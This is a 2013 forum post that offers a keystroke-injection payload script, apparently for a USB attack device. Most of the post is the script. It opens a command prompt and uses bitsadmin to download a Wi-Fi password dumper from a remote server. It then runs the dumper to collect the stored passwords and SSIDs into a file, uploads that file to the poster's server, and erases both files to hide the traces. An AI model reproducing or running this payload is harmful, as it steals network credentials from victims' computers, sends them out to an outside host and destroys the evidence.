crashie Posted March 10, 2013 Share Posted March 10, 2013 (edited) Here's one contribution to add to the payload repository on the wiki. Feel free to use it. There is one thing to have in mind though, it only works with IIS servers which have enabled BITS transfers to a "upload" folder. But the code needed is tiny once you have set up a server to receive the file/files. Below is how I use it to download a Wi-Fi password decryptor which decrypts all the stored passwords on the target computer to a .htm file together with SSID. Then it uploads the .htm to my webserver and after that it deletes the password decryptor and the .htm file and exits. Bitsadmin is deprecated in Windows 7 but still there and running per default :) More commonly used in Vista and XP SP2. You can of course use it for other tools or executables that dumps stuff to another file.. :) Requirement: An IIS server with BITS server extension enabled and configured. It's easy to set up, just drop me a PM and I'll assist you. REM ### BITSADMIN Download/Execute & Upload payload with file erase ### --- By crashie --- GUI R DELAY 200 STRING cmd ENTER DELAY 600 STRING bitsadmin /transfer myjob /download /priority high http://server.com/upload/wifipass.dba %TEMP%\wifi.exe &start %TEMP%\wifi.exe wipass.htm ENTER DELAY 3000 ENTER STRING bitsadmin /transfer uloaded /upload /priority high http://server.com/upload/wipass.htm %USERPROFILE%\wipass.htm ENTER DELAY 3000 STRING erase /Q %TEMP%\wifi.exe %UserProfile%\wipass.htm ENTER DELAY 50 STRING exit ENTER Edited March 10, 2013 by crashie formatting - added [code] tags Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.